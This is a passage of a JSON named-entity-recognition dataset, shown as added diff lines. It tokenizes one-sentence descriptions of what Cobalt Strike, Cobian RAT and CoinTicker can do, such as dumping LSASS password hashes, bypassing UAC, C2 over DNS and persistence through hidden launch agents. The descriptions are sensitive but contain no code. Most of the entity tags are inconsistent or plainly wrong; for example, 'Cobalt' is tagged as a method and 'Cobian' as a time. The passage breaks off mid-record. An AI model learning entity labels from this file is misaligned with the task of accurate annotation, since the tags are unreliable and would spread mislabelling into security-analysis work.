"tokens": [ + "Cobalt", + "Strike", + "can", + "perform", + "browser", + "pivoting", + "and", + "inject", + "into", + "a", + "user's", + "browser", + "to", + "inherit", + "cookies,", + "authenticated", + "HTTP", + "sessions,", + "and", + "client", + "SSL", + "certificates." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-Way", + "B-Way", + "O", + "B-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "Cobalt", + "Strike", + "can", + "use", + "a", + "number", + "of", + "known", + "techniques", + "to", + "bypass", + "Windows", + "UAC." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "B-HackOrg" + ] + }, + { + "tokens": [ + "Cobalt", + "Strike", + "can", + "use", + "self", + "signed", + "Java", + "applets", + "to", + "execute", + "signed", + "applet", + "attacks." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "B-Org", + "B-OffAct" + ] + }, + { + "tokens": [ + "Cobalt", + "Strike", + "can", + "use", + "a", + "custom", + "command", + "and", + "control", + "protocol", + "that", + "can", + "be", + "encapsulated", + "in", + "DNS.", + "All", + "protocols", + "use", + "their", + "standard", + "assigned", + "ports." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cobalt", + "Strike", + "will", + "break", + "large", + "data", + "sets", + "into", + "smaller", + "chunks", + "for", + "exfiltration." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cobalt", + "Strike", + "can", + "collect", + "data", + "from", + "a", + "local", + "system." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cobalt", + "Strike", + "can", + "deobfuscate", + "shellcode", + "using", + "a", + "rolling", + "XOR", + "and", + "decrypt", + "metadata", + "from", + "Beacon", + "sessions." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cobalt", + "Strike", + "has", + "the", + "ability", + "to", + "use", + "Smart", + "Applet", + "attacks", + "to", + "disable", + "the", + "Java", + "SecurityManager", + "sandbox." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "I-OffAct", + "I-OffAct", + "I-OffAct", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "Cobalt", + "Strike", + "can", + "deliver", + "Beacon", + "payloads", + "for", + "lateral", + "movement", + "by", + "leveraging", + "remote", + "COM", + "execution." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cobalt", + "Strike", + "can", + "determine", + "if", + "the", + "user", + "on", + "an", + "infected", + "machine", + "is", + "in", + "the", + "admin", + "or", + "domain", + "admin", + "group." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cobalt", + "Strike", + "can", + "use", + "known", + "credentials", + "to", + "run", + "commands", + "and", + "spawn", + "processes", + "as", + "a", + "domain", + "user", + "account." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cobalt", + "Strike", + "has", + "the", + "ability", + "to", + "accept", + "a", + "value", + "for", + "HTTP", + "Host", + "Header", + "to", + "enable", + "domain", + "fronting." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "I-HackOrg", + "B-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cobalt", + "Strike", + "can", + "identify", + "targets", + "by", + "querying", + "account", + "groups", + "on", + "a", + "domain", + "contoller." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cobalt", + "Strike", + "has", + "the", + "ability", + "to", + "load", + "DLLs", + "via", + "reflective", + "injection." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "B-HackOrg", + "O", + "I-Way", + "O" + ] + }, + { + "tokens": [ + "Cobalt", + "Strike", + "can", + "exploit", + "Oracle", + "Java", + "vulnerabilities", + "for", + "execution,", + "including", + "CVE-2011-3544,", + "CVE-2013-2465,", + "CVE-2012-4681,", + "and", + "CVE-2013-2460." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "B-Exp", + "O", + "O", + "O", + "B-Features", + "B-Features", + "B-Features", + "O", + "B-Features" + ] + }, + { + "tokens": [ + "Cobalt", + "Strike", + "can", + "exploit", + "vulnerabilities", + "such", + "as", + "MS14-058." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Cobalt", + "Strike", + "can", + "conduct", + "peer-to-peer", + "communication", + "over", + "Windows", + "named", + "pipes", + "encapsulated", + "in", + "the", + "SMB", + "protocol.", + "All", + "protocols", + "use", + "their", + "standard", + "assigned", + "ports." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cobalt", + "Strike", + "can", + "explore", + "files", + "on", + "a", + "compromised", + "system." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cobalt", + "Strike", + "includes", + "a", + "capability", + "to", + "modify", + "the", + "Beacon", + "payload", + "to", + "eliminate", + "known", + "signatures", + "or", + "unpacking", + "methods." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cobalt", + "Strike", + "can", + "deliver", + "additional", + "payloads", + "to", + "victim", + "machines." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cobalt", + "Strike", + "can", + "be", + "configured", + "to", + "have", + "commands", + "relayed", + "over", + "a", + "peer-to-peer", + "network", + "of", + "infected", + "hosts.", + "This", + "can", + "be", + "used", + "to", + "limit", + "the", + "number", + "of", + "egress", + "points,", + "or", + "provide", + "access", + "to", + "a", + "host", + "without", + "direct", + "internet", + "access." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "B-HackOrg", + "B-Features", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "Cobalt", + "Strike", + "System", + "Profiler", + "can", + "use", + "JavaScript", + "to", + "perform", + "reconnaissance", + "actions." + ], + "ner_tags": [ + "O", + "B-Way", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cobalt", + "Strike", + "can", + "track", + "key", + "presses", + "with", + "a", + "keylogger", + "module." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cobalt", + "Strike", + "can", + "spawn", + "a", + "job", + "to", + "inject", + "into", + "LSASS", + "memory", + "and", + "dump", + "password", + "hashes." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Cobalt", + "Strike", + "can", + "use", + "known", + "credentials", + "to", + "run", + "commands", + "and", + "spawn", + "processes", + "as", + "a", + "local", + "user", + "account." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cobalt", + "Strike", + "can", + "use", + "<code>net", + "localgroup</code>", + "to", + "list", + "local", + "groups", + "on", + "a", + "system." + ], + "ner_tags": [ + "B-Way", + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "B-HackOrg", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cobalt", + "Strike", + "can", + "make", + "tokens", + "from", + "known", + "credentials." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cobalt", + "Strike", + "can", + "modify", + "Registry", + "values", + "within", + "<code>HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\<Excel", + "Version>\\Excel\\Security\\AccessVBOM\\</code>", + "to", + "enable", + "the", + "execution", + "of", + "additional", + "code." + ], + "ner_tags": [ + "B-Way", + "B-HackOrg", + "O", + "I-Features", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cobalt", + "Strike's", + "Beacon", + "payload", + "is", + "capable", + "of", + "running", + "shell", + "commands", + "without", + "<code>cmd.exe</code>", + "and", + "PowerShell", + "commands", + "without", + "<code>powershell.exe</code>" + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "B-SamFile", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "Cobalt", + "Strike", + "can", + "perform", + "port", + "scans", + "from", + "an", + "infected", + "host." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cobalt", + "Strike", + "can", + "query", + "shared", + "drives", + "on", + "the", + "local", + "system." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cobalt", + "Strike", + "can", + "be", + "configured", + "to", + "use", + "TCP,", + "ICMP,", + "and", + "UDP", + "for", + "C2", + "communications." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cobalt", + "Strike", + "can", + "hash", + "functions", + "to", + "obfuscate", + "calls", + "to", + "the", + "Windows", + "API", + "and", + "use", + "a", + "public/private", + "key", + "pair", + "to", + "encrypt", + "Beacon", + "session", + "metadata." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "I-Features", + "B-HackOrg" + ] + }, + { + "tokens": [ + "Cobalt", + "Strike", + "has", + "the", + "ability", + "to", + "use", + "an", + "Excel", + "Workbook", + "to", + "execute", + "additional", + "code", + "by", + "enabling", + "Office", + "to", + "trust", + "macros", + "and", + "execute", + "code", + "without", + "user", + "permission." + ], + "ner_tags": [ + "B-Way", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cobalt", + "Strike", + "can", + "spawn", + "processes", + "with", + "alternate", + "PPIDs." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cobalt", + "Strike", + "can", + "perform", + "pass", + "the", + "hash." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cobalt", + "Strike", + "can", + "execute", + "a", + "payload", + "on", + "a", + "remote", + "host", + "with", + "PowerShell.", + "This", + "technique", + "does", + "not", + "write", + "any", + "data", + "to", + "disk.", + "Cobalt", + "Strike", + "can", + "also", + "use", + "PowerSploit", + "and", + "other", + "scripting", + "frameworks", + "to", + "perform", + "execution." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cobalt", + "Strike", + "can", + "use", + "spoof", + "arguments", + "in", + "spawned", + "processes", + "that", + "execute", + "beacon", + "commands." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cobalt", + "Strike's", + "Beacon", + "payload", + "can", + "collect", + "information", + "on", + "process", + "details." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cobalt", + "Strike", + "can", + "use", + "process", + "hollowing", + "for", + "execution." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Cobalt", + "Strike", + "can", + "inject", + "a", + "variety", + "of", + "payloads", + "into", + "processes", + "dynamically", + "chosen", + "by", + "the", + "adversary." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "B-Features", + "I-Features", + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cobalt", + "Strike", + "can", + "mimic", + "the", + "HTTP", + "protocol", + "for", + "C2", + "communication,", + "while", + "hiding", + "the", + "actual", + "data", + "in", + "either", + "an", + "HTTP", + "header,", + "URI", + "parameter,", + "the", + "transaction", + "body,", + "or", + "appending", + "it", + "to", + "the", + "URI." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cobalt", + "Strike", + "uses", + "a", + "custom", + "command", + "and", + "control", + "protocol", + "that", + "is", + "encapsulated", + "in", + "HTTP,", + "HTTPS,", + "or", + "DNS.", + "In", + "addition,", + "it", + "conducts", + "peer-to-peer", + "communication", + "over", + "Windows", + "named", + "pipes", + "encapsulated", + "in", + "the", + "SMB", + "protocol.", + "All", + "protocols", + "use", + "their", + "standard", + "assigned", + "ports." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cobalt", + "Strike", + "can", + "use", + "Python", + "to", + "perform", + "execution." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cobalt", + "Strike", + "can", + "query", + "<code>HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\<Excel", + "Version>\\Excel\\Security\\AccessVBOM\\</code>", + "to", + "determine", + "if", + "the", + "security", + "setting", + "for", + "restricting", + "default", + "programmatic", + "access", + "is", + "enabled." + ], + "ner_tags": [ + "B-Way", + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cobalt", + "Strike's", + "<code>execute-assembly</code>", + "command", + "can", + "run", + "a", + ".NET", + "executable", + "within", + "the", + "memory", + "of", + "a", + "sacrificial", + "process", + "by", + "loading", + "the", + "CLR." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-HackOrg" + ] + }, + { + "tokens": [ + "Cobalt", + "Strike", + "can", + "start", + "a", + "VNC-based", + "remote", + "desktop", + "server", + "and", + "tunnel", + "the", + "connection", + "through", + "the", + "already", + "established", + "C2", + "channel." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cobalt", + "Strike", + "uses", + "the", + "native", + "Windows", + "Network", + "Enumeration", + "APIs", + "to", + "interrogate", + "and", + "discover", + "targets", + "in", + "a", + "Windows", + "Active", + "Directory", + "network." + ], + "ner_tags": [ + "B-Way", + "B-HackOrg", + "O", + "O", + "O", + "O", + "I-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cobalt", + "Strike", + "can", + "use", + "`rundll32.exe`", + "to", + "load", + "DLL", + "from", + "the", + "command", + "line." + ], + "ner_tags": [ + "B-Way", + "B-HackOrg", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cobalt", + "Strike", + "can", + "use", + "Window", + "admin", + "shares", + "(C$", + "and", + "ADMIN$)", + "for", + "lateral", + "movement." + ], + "ner_tags": [ + "B-Way", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cobalt", + "Strike", + "can", + "SSH", + "to", + "a", + "remote", + "service." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cobalt", + "Strike", + "can", + "set", + "its", + "Beacon", + "payload", + "to", + "reach", + "out", + "to", + "the", + "C2", + "server", + "on", + "an", + "arbitrary", + "and", + "random", + "interval." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cobalt", + "Strike's", + "Beacon", + "payload", + "is", + "capable", + "of", + "capturing", + "screenshots." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "B-Tool", + "O", + "O", + "O", + "O", + "I-Features", + "B-HackOrg" + ] + }, + { + "tokens": [ + "Cobalt", + "Strike", + "can", + "recover", + "hashed", + "passwords." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cobalt", + "Strike", + "can", + "use", + "PsExec", + "to", + "execute", + "a", + "payload", + "on", + "a", + "remote", + "host.", + "It", + "can", + "also", + "use", + "Service", + "Control", + "Manager", + "to", + "start", + "new", + "services." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "I-Org", + "I-Org", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "Cobalt", + "Strike", + "System", + "Profiler", + "can", + "discover", + "applications", + "through", + "the", + "browser", + "and", + "identify", + "the", + "version", + "of", + "Java", + "the", + "target", + "has." + ], + "ner_tags": [ + "O", + "B-Way", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cobalt", + "Strike", + "can", + "use", + "Base64,", + "URL-safe", + "Base64,", + "or", + "NetBIOS", + "encoding", + "in", + "its", + "C2", + "traffic." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "O", + "B-Way", + "B-Way", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cobalt", + "Strike", + "can", + "use", + "<code>sudo</code>", + "to", + "run", + "a", + "command." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cobalt", + "Strike", + "has", + "the", + "ability", + "to", + "use", + "AES-256", + "symmetric", + "encryption", + "in", + "CBC", + "mode", + "with", + "HMAC-SHA-256", + "to", + "encrypt", + "task", + "commands", + "and", + "XOR", + "to", + "encrypt", + "shell", + "code", + "and", + "configuration", + "data." + ], + "ner_tags": [ + "B-Way", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "B-Features", + "O", + "B-Features", + "O", + "O", + "O", + "B-Features", + "I-Features", + "I-Features", + "O", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "Cobalt", + "Strike", + "can", + "determine", + "the", + "NetBios", + "name", + "and", + "the", + "IP", + "addresses", + "of", + "targets", + "machines", + "including", + "domain", + "controllers." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cobalt", + "Strike", + "can", + "produce", + "a", + "sessions", + "report", + "from", + "compromised", + "hosts." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cobalt", + "Strike", + "can", + "enumerate", + "services", + "on", + "compromised", + "hosts." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cobalt", + "Strike", + "can", + "timestomp", + "any", + "files", + "or", + "payloads", + "placed", + "on", + "a", + "target", + "machine", + "to", + "help", + "them", + "blend", + "in." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features" + ] + }, + { + "tokens": [ + "Cobalt", + "Strike", + "can", + "steal", + "access", + "tokens", + "from", + "exiting", + "processes." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cobalt", + "Strike", + "can", + "use", + "VBA", + "to", + "perform", + "execution." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cobalt", + "Strike", + "can", + "use", + "a", + "custom", + "command", + "and", + "control", + "protocol", + "that", + "can", + "be", + "encapsulated", + "in", + "HTTP", + "or", + "HTTPS.", + "All", + "protocols", + "use", + "their", + "standard", + "assigned", + "ports." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cobalt", + "Strike", + "uses", + "a", + "command-line", + "interface", + "to", + "interact", + "with", + "systems." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cobalt", + "Strike", + "can", + "use", + "WMI", + "to", + "deliver", + "a", + "payload", + "to", + "a", + "remote", + "host." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cobalt", + "Strike", + "can", + "use", + "<code>WinRM</code>", + "to", + "execute", + "a", + "payload", + "on", + "a", + "remote", + "host." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cobalt", + "Strike", + "can", + "install", + "a", + "new", + "service." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cobian", + "RAT", + "has", + "a", + "feature", + "to", + "perform", + "voice", + "recording", + "on", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cobian", + "RAT", + "uses", + "DNS", + "for", + "C2." + ], + "ner_tags": [ + "B-Way", + "B-SecTeam", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Cobian", + "RAT", + "has", + "a", + "feature", + "to", + "perform", + "keylogging", + "on", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cobian", + "RAT", + "creates", + "an", + "autostart", + "Registry", + "key", + "to", + "ensure", + "persistence." + ], + "ner_tags": [ + "B-Time", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cobian", + "RAT", + "has", + "a", + "feature", + "to", + "perform", + "screen", + "capture." + ], + "ner_tags": [ + "B-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cobian", + "RAT", + "obfuscates", + "communications", + "with", + "the", + "C2", + "server", + "using", + "Base64", + "encoding." + ], + "ner_tags": [ + "B-Idus", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cobian", + "RAT", + "has", + "a", + "feature", + "to", + "access", + "the", + "webcam", + "on", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cobian", + "RAT", + "can", + "launch", + "a", + "remote", + "command", + "shell", + "interface", + "for", + "executing", + "commands." + ], + "ner_tags": [ + "B-SamFile", + "B-SecTeam", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CoinTicker", + "decodes", + "the", + "initially-downloaded", + "hidden", + "encoded", + "file", + "using", + "OpenSSL." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "CoinTicker", + "downloads", + "the", + "EggShell", + "mach-o", + "binary", + "using", + "curl,", + "which", + "does", + "not", + "set", + "the", + "quarantine", + "flag." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CoinTicker", + "downloads", + "the", + "following", + "hidden", + "files", + "to", + "evade", + "detection", + "and", + "maintain", + "persistence:", + "/private/tmp/.info.enc,", + "/private/tmp/.info.py,", + "/private/tmp/.server.sh,", + "~/Library/LaunchAgents/.espl.plist,", + "~/Library/Containers/.[random", + "string]/[random", + "string]." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CoinTicker", + "executes", + "a", + "Python", + "script", + "to", + "download", + "its", + "second", + "stage." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CoinTicker", + "creates", + "user", + "launch", + "agents", + "named", + ".espl.plist", + "and", + "com.apple.[random", + "string].plist", + "to", + "establish", + "persistence." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "B-SamFile", + 